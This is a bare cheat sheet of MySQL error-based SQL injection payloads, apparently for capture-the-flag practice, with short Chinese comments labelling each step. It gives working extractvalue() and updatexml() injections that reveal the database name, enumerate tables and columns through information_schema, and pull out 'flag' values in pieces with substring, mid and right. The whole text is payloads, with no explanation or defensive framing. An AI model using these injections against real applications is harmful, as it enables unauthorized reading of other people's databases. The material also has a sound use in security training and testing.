1 2 3 4 5 6 7 8 9 10 11 12 13 14
| extractValue(): 1' union select 1,extractvalue(1,concat('~',(select database()))),3# 1' union select 1,extractvalue(1,concat('~',(select group_concat(flag) from test_tb))),3# extractvalue(1,concat('~',(select substring(group_concat(flag),31,30) from test_tb))),3# //拼接后半段flag substring(group_concat(flag),1,30) from db.table mid(group_concat(flag),1,20) from db.table updatexml() 1 and updatexml(1,concat(0x7e,database(),0x7e),1) #爆库 #爆表 1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #爆字段 1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e),1) 1 and updatexml(1,concat(0x7e,(select group_concat(flag)from flag),0x7e),1) #爆字段内容 1 and updatexml(1,concat(0x7e,right((select group_concat(flag) from flag),15),0x7e),1) #爆字段内容后半段
|